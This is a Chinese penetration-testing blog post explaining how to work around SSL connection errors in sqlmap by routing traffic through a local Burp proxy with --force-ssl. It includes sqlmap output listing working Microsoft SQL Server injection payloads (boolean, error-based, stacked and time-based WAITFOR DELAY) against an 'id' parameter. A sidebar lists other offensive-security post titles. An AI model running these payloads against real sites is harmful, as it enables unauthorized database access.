

Drunkmars's Blog

Drunkmars's Blog

sqlmap在https下的一种错误 - ssl连接失败



sqlmap在https下的一种错误 - ssl连接失败

web渗透

字数统计: 711阅读时长: 3 min

 2021/03/16   Share

• 
• 
• 
• 
• 

前不久与师傅的交流中师傅考了我一个问题，在用sqlmap跑的时候遇到ssl爆红该怎么办，因为在实战中并没有遇到过这种情况，所以今天补一下知识。

首先查询了ssl的概念，通俗来说，如果一个网站没有安装ssl证书，那么他的传输方式就是http传输，安装ssl证书过后就是https传输，https传输加密性比http好得多，这是其一；当你访问一些没有安装ssl的网站时，会出现如下界面：

没有安装ssl会导致信息很容易被窃取，这是其二；拥有ssl证书的网站会在谷歌和百度拥有更高的权重，通俗来说就是当你搜索一个相同的内容时，拥有ssl的网站肯定会比没有ssl的网站在搜索上靠前。

了解概念之后回到师傅抛给我的问题，为什么网站会报ssl连接错误呢？

就是因为ssl证书的原因，而且sqlmap它是不能自动伪造ssl证书的，所以这时候就有两种方法去解决ssl爆红的操作：

1. 通过本地代理端口进行访问

2. 通过搭建web，访问代理文件进行注入

师傅给我说的是第一种方法是最常用的，用bp代理本地8080端口

--proxy http://127.0.0.1:8080

8080端口是被用于WWW代理服务的，apache安装后默认的端口就是8080端口。

因为目标站是https，加入--force-ssl参数

然而还是报错ssl，这时候就只能代理本地的8080端口

然后就能够顺利跑出来，结果如下：

Parameter: id (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=**3395** AND **1967**=**1967**

Vector: AND [INFERENCE]

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)

Payload: id=**3395** AND **8669** IN (SELECT
(CHAR(**113**)+CHAR(**118**)+CHAR(**106**)+CHAR(**98**)+CHAR(**113**)+(SELECT
(CASE WHEN (**8669**=**8669**) THEN CHAR(**49**) ELSE CHAR(**48**)
END))+CHAR(**113**)+CHAR(**112**)+CHAR(**107**)+CHAR(**118**)+CHAR(**113**)))

Vector: AND [RANDNUM] IN (SELECT
('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: inline query

Title: Microsoft SQL Server/Sybase inline queries

Payload: id=(SELECT
CHAR(**113**)+CHAR(**118**)+CHAR(**106**)+CHAR(**98**)+CHAR(**113**)+(SELECT
(CASE WHEN (**6806**=**6806**) THEN CHAR(**49**) ELSE CHAR(**48**)
END))+CHAR(**113**)+CHAR(**112**)+CHAR(**107**)+CHAR(**118**)+CHAR(**113**))

Vector: (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: id=**3395**;WAITFOR DELAY '0:0:5'--

Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)

Payload: id=**3395** WAITFOR DELAY '0:0:5'--

Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

另外一种方法就是用一个php文件直接用sqlmap跑php就ok

因为第二种方法比较麻烦，还要写代码，这里就先不搞了QAQ

查阅google后看到，第一种方法不一定用bp代理，通过charles本地映射后访问也可以

原文作者：Drunkmars

原文链接：http://drunkmars.top/2021/03/16/sqlmap%E5%9C%A8https%E4%B8%8B%E6%8A%A5%E9%94%99%20-%20ssl%E8%BF%9E%E6%8E%A5%E5%A4%B1%E8%B4%A5/

发表日期：三月 16日 2021, 12:00:00 凌晨

更新日期：May 21st 2021, 11:39:44 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  jboss打入内网的四种方式
• Previous Post
  汇编JCC指令表

Powered by Hexotheme Archer

PV: :)

CATALOG

• Archive
• Tag
• Cate

Total : 117

2022

• 05/14 浅谈EDR绕过
• 05/14 调用NtCreateUserProcess创建进程绕过杀软hook
• 05/12 ETW的攻与防
• 05/07 对抗无落地的shellcode注入
• 05/04 x64环境下隐藏可执行内存
• 05/01 深入理解注册表监控
• 04/30 windows环境下的自保护探究
• 04/29 64位下使用回调函数实现监控
• 04/16 通过嵌入x64汇编隐藏数据&反调试
• 04/13 构建API调用框架绕过杀软hook
• 04/10 windows环境下的反调试探究
• 04/07 浅谈hook攻防
• 04/04 通过硬件断点绕过hook检测
• 04/01 windows环境下的调试器探究
• 03/28 windows异常处理探究
• 03/22 ring0下使用内核重载绕过杀软hook
• 03/16 基于全局句柄表发现隐藏进程
• 03/03 基于PEB断链实现进程与模块隐藏
• 02/20 ring3下API的逆向分析及重构
• 02/17 shellcode编写探究
• 02/16 ring0下的Inline hook
• 02/15 ring0下的进程保护
• 02/14 进程强杀初探
• 01/17 URLDNS链探究
• 01/15 RMI探究
• 01/14 java反射探究
• 01/10 java反序列化探究

2021

• 12/05 关于抓取明文的探究
• 11/08 使用api创建计划任务详解
• 11/07 自删除技术的实现
• 11/05 CS中上线不出网主机
• 11/04 创建进程的几种方式
• 10/27 自启动技术详解
• 10/26 初探傀儡进程
• 10/25 socket的探究与实现
• 10/22 通过内存写入隐藏模块
• 10/21 初探进程伪装
• 10/21 关于进程隐藏的探究
• 10/19 关于bypassuac的探究
• 10/07 初探com劫持
• 10/04 CSV注入获取meterpreter
• 10/04 反沙箱调试
• 10/04 父进程伪造
• 10/04 调试与反调试的探究
• 10/03 初探dll劫持
• 10/01 关于几种dll注入的学习
• 09/26 浅谈内网转发与流量代理
• 09/13 记一次外网打点到内网渗透
• 09/12 hook技术详解
• 09/10 mysql提权总结
• 08/23 php漏洞大杂烩
• 08/20 struts2漏洞总结
• 08/16 tomcat漏洞大杂烩
• 08/09 红日靶场4
• 08/04 weblogic漏洞大杂烩
• 07/28 浅谈域环境下布置水坑实现hash窃取
• 07/21 红日靶场2
• 07/20 redis漏洞总结
• 07/19 spring漏洞总结
• 07/19 红日靶场3
• 07/06 红日靶场5
• 07/05 一种简单的反虚拟机调试方法
• 06/16 C++二叉树实现
• 06/15 C++链表实现
• 06/13 msf生成木马小结
• 06/11 certutil探究
• 06/10 横向移动总结
• 06/09 从mimikatz抓取密码学习攻防
• 06/08 LLMNR和NetBIOS欺骗攻击分析及防范
• 06/04 NULL、0、nullptr 区别分析
• 06/02 RPC提权
• 06/01 CVE-2019-1388 UAC提权
• 06/01 如何编写属于自己的第一个exp
• 05/29 读书笔记
• 05/28 vulnhub靶场实战
• 05/26 渗透测试中弹shell的多种方式及bypass
• 05/25 CVE-2020-1472详解
• 05/23 从外围打点到内网渗透拿下域控
• 05/19 内网渗透之向日葵妙用
• 05/12 Dedecms(织梦cms)漏洞分析及复现
• 05/12 Empirecms(帝国cms)漏洞分析及复现
• 05/11 CVE-2020-0796分析及利用
• 05/11 MS17_010检测及打法
• 05/11 木马解析&disable_fuctions
• 05/08 jboss之JMXInvokerServlet反序列化漏洞分析利用
• 05/08 内网穿透的n种姿势
• 05/06 文件上传bypass安全狗
• 04/28 cs加载宏上线初探
• 04/27 内网渗透之DPAPI机制学习
• 04/20 隐藏用户的创建和使用
• 04/19 利用卷影拷贝服务提取ntds.dit
• 04/17 中间人攻击之arp欺骗
• 04/15 浅谈域渗透中组策略及gpp运用
• 04/14 thinkphp漏洞分析与总结
• 04/13 msf使用详解
• 04/13 sql注入之超详细sqlmap使用攻略
• 04/10 windows认证解读
• 04/09 巧用smb beacon拿下不出网主机(红日靶场1)
• 04/08 phpmyadmin页面getshell
• 04/08 windows环境下抓密码总结
• 04/04 Stega
• 04/02 内网渗透命令
• 03/30 IPC命令&计划任务上线
• 03/29 常用端口总结
• 03/27 mysql离线解析密码
• 03/27 绕过CDN找源站ip
• 03/27 记一次php、sql注入学习后的一道ctf代码审计题复盘
• 03/26 小白的第一次sql实战
• 03/23 crackme001
• 03/21 certutil&wmic绕过
• 03/17 vps-java环境配置
• 03/16 Joomla框架搭建&远程代码执行(RCE)漏洞复现
• 03/16 jboss打入内网的四种方式
• 03/16 sqlmap在https下的一种错误 - ssl连接失败
• 03/14 汇编JCC指令表
• 03/13 README
• 03/13 写在最前

 内网渗透  cve  漏洞复现  C++  二进制  内核  cms  web渗透  private  横向移动  提权  windows  ctf  java  cobalt strike  apt  java中间件  msf命令  oa  中间件  mysql  sql  thinkphp  web  x64  环境配置  域渗透  碎碎念  bypass  php  靶场实战  权限维持



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

